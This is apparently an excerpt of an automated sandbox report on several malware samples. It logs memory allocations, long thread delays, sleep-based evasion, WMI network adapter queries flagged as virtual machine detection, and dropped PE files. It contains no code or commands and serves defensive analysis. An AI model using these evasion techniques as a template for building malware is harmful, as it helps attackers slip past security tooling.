Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe	Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)

Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration

Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Memory allocated: 13C0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Memory allocated: 3050000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Memory allocated: 2E70000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe	Memory allocated: 2F40000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe	Memory allocated: 30F0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe	Memory allocated: 50F0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Memory allocated: 18E0000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Memory allocated: 3290000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Memory allocated: 5290000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Memory allocated: 12A0000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Memory allocated: 2D70000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Memory allocated: 4D70000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Memory allocated: 1010000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Memory allocated: 2C40000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Memory allocated: 2980000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe	Memory allocated: A60000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe	Memory allocated: 23B0000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe	Memory allocated: 43B0000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Memory allocated: 2D80000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Memory allocated: 3000000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Memory allocated: 2D80000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe	Memory allocated: A40000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe	Memory allocated: 2440000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe	Memory allocated: 4440000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Memory allocated: 1400000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Memory allocated: 2F80000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Memory allocated: 2D60000 memory reserve \| memory write watch

Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 1199936	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 1199727	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 1199968
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 1199670
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 1199498
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 1199073
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 1198713
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 1198561
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 1198403
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 1198228
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 1198099
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 1197943
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 1197780
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 1197650
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 1197541
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 1197429
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 1197315
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 1197190
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 1197077
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 1196967
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 1196858
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 1196748
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 1196639
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 1196529
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 1196346
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 1196101
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 1195982
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 1195872
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 1195765
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 1195654
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 1195546
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 1195435
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 1195326
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 1195218
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 1195105
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 1194999
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 1194886
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 1194780
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 1194671
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 1199953
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 1199843
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 1199734
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 1199625
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 1199515
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 1199406
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 1199296
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 1199187
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Thread delayed: delay time: 922337203685477

Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Window / User API: threadDelayed 3681	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Window / User API: threadDelayed 4211	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 7004
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 1214
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Window / User API: threadDelayed 5282
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Window / User API: threadDelayed 4506
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Window / User API: threadDelayed 5096
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Window / User API: threadDelayed 4640
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Window / User API: threadDelayed 3990
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Window / User API: threadDelayed 5814

Source: C:\Users\Public\Libraries\lxsyrsiW.pif	Dropped PE file which has not been started: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe			Jump to dropped file
Source: C:\Windows\SysWOW64\esentutl.exe	Dropped PE file which has not been started: C:\Users\Public\xpha.pif			Jump to dropped file

Source: C:\Users\Public\Libraries\Wisrysxl.PIF

API coverage: 9.5 %

Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7244	Thread sleep count: 36 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7244	Thread sleep time: -33204139332677172s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7244	Thread sleep time: -200000s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7248	Thread sleep count: 3681 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7244	Thread sleep time: -99859s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7244	Thread sleep time: -99730s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7244	Thread sleep time: -99622s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7244	Thread sleep time: -99474s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7248	Thread sleep count: 4211 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7244	Thread sleep time: -99149s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7244	Thread sleep time: -99031s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7244	Thread sleep time: -98921s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7244	Thread sleep time: -98812s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7244	Thread sleep time: -98697s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7244	Thread sleep time: -98578s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7244	Thread sleep time: -98468s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7244	Thread sleep time: -98358s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7244	Thread sleep time: -98249s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7244	Thread sleep time: -98140s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7244	Thread sleep time: -98030s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7244	Thread sleep time: -97921s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7244	Thread sleep time: -97811s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7244	Thread sleep time: -97697s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7244	Thread sleep time: -97582s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7244	Thread sleep time: -97453s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7244	Thread sleep time: -97343s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7244	Thread sleep time: -97234s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7244	Thread sleep time: -97085s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7244	Thread sleep time: -96969s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7244	Thread sleep time: -96852s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7244	Thread sleep time: -99890s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7244	Thread sleep time: -99778s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7244	Thread sleep time: -99662s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7244	Thread sleep time: -99531s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7244	Thread sleep time: -99418s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7244	Thread sleep time: -99305s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7244	Thread sleep time: -99198s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7244	Thread sleep time: -99078s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7244	Thread sleep time: -98949s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7244	Thread sleep time: -98829s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7244	Thread sleep time: -98714s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7244	Thread sleep time: -98595s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7244	Thread sleep time: -98458s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7244	Thread sleep time: -98331s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7244	Thread sleep time: -98203s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7244	Thread sleep time: -98087s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7244	Thread sleep time: -97840s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7244	Thread sleep time: -97276s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7244	Thread sleep time: -97134s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7244	Thread sleep time: -1199936s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7244	Thread sleep time: -1199727s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe TID: 2848	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 4884	Thread sleep count: 7004 > 30
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7176	Thread sleep time: -6456360425798339s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5724	Thread sleep count: 1214 > 30
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3768	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe TID: 7204	Thread sleep time: -316920000s >= -30000s
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe TID: 7204	Thread sleep time: -270360000s >= -30000s
Source: C:\Windows\SysWOW64\timeout.exe TID: 5388	Thread sleep count: 43 > 30
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe TID: 7228	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7712	Thread sleep time: -32281802128991695s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7712	Thread sleep time: -200000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7712	Thread sleep time: -99866s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7712	Thread sleep time: -99745s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7712	Thread sleep time: -99623s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7712	Thread sleep time: -99394s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7712	Thread sleep time: -99138s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7712	Thread sleep time: -98961s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7712	Thread sleep time: -98831s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7712	Thread sleep time: -98708s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7712	Thread sleep time: -98580s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7712	Thread sleep time: -98452s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7712	Thread sleep time: -98339s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7712	Thread sleep time: -98227s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7712	Thread sleep time: -98116s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7712	Thread sleep time: -97975s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7712	Thread sleep time: -97848s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7712	Thread sleep time: -97712s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7712	Thread sleep time: -195200s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7712	Thread sleep time: -97490s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7712	Thread sleep time: -99888s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7712	Thread sleep time: -99776s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7712	Thread sleep time: -99634s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7712	Thread sleep time: -99301s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7712	Thread sleep time: -98802s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7712	Thread sleep time: -98606s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7712	Thread sleep time: -98475s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7712	Thread sleep time: -98258s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7712	Thread sleep time: -98120s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7712	Thread sleep time: -97972s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7712	Thread sleep time: -97845s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7712	Thread sleep time: -97717s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7712	Thread sleep time: -97457s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7712	Thread sleep time: -1199968s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7712	Thread sleep time: -1199670s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7712	Thread sleep time: -1199498s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7712	Thread sleep time: -1199073s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7712	Thread sleep time: -1198713s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7712	Thread sleep time: -1198561s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7712	Thread sleep time: -1198403s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7712	Thread sleep time: -1198228s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7712	Thread sleep time: -1198099s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7712	Thread sleep time: -1197943s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7712	Thread sleep time: -1197780s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7712	Thread sleep time: -1197650s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7712	Thread sleep time: -1197541s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7712	Thread sleep time: -1197429s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7712	Thread sleep time: -1197315s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7712	Thread sleep time: -1197190s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7712	Thread sleep time: -1197077s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7712	Thread sleep time: -1196967s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7712	Thread sleep time: -1196858s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7712	Thread sleep time: -1196748s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7712	Thread sleep time: -1196639s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7712	Thread sleep time: -1196529s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7712	Thread sleep time: -1196346s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7712	Thread sleep time: -1196101s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7712	Thread sleep time: -1195982s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7712	Thread sleep time: -1195872s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7712	Thread sleep time: -1195765s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7712	Thread sleep time: -1195654s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7712	Thread sleep time: -1195546s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7712	Thread sleep time: -1195435s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7712	Thread sleep time: -1195326s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7712	Thread sleep time: -1195218s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7712	Thread sleep time: -1195105s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7712	Thread sleep time: -1194999s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7712	Thread sleep time: -1194886s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7712	Thread sleep time: -1194780s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7712	Thread sleep time: -1194671s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe TID: 7616	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7988	Thread sleep count: 36 > 30
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7988	Thread sleep time: -33204139332677172s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7988	Thread sleep time: -200000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7992	Thread sleep count: 3990 > 30
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7988	Thread sleep time: -99856s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7988	Thread sleep time: -99712s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7988	Thread sleep time: -99584s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7988	Thread sleep time: -99457s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7988	Thread sleep time: -99341s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7992	Thread sleep count: 5814 > 30
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7988	Thread sleep time: -99233s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7988	Thread sleep time: -99120s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7988	Thread sleep time: -99006s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7988	Thread sleep time: -98882s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7988	Thread sleep time: -98773s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7988	Thread sleep time: -98662s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7988	Thread sleep time: -98538s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7988	Thread sleep time: -98427s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7988	Thread sleep time: -98304s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7988	Thread sleep time: -98023s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7988	Thread sleep time: -97911s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7988	Thread sleep time: -97788s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7988	Thread sleep time: -97678s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7988	Thread sleep time: -97554s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7988	Thread sleep time: -97443s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7988	Thread sleep time: -99875s >= -30000s
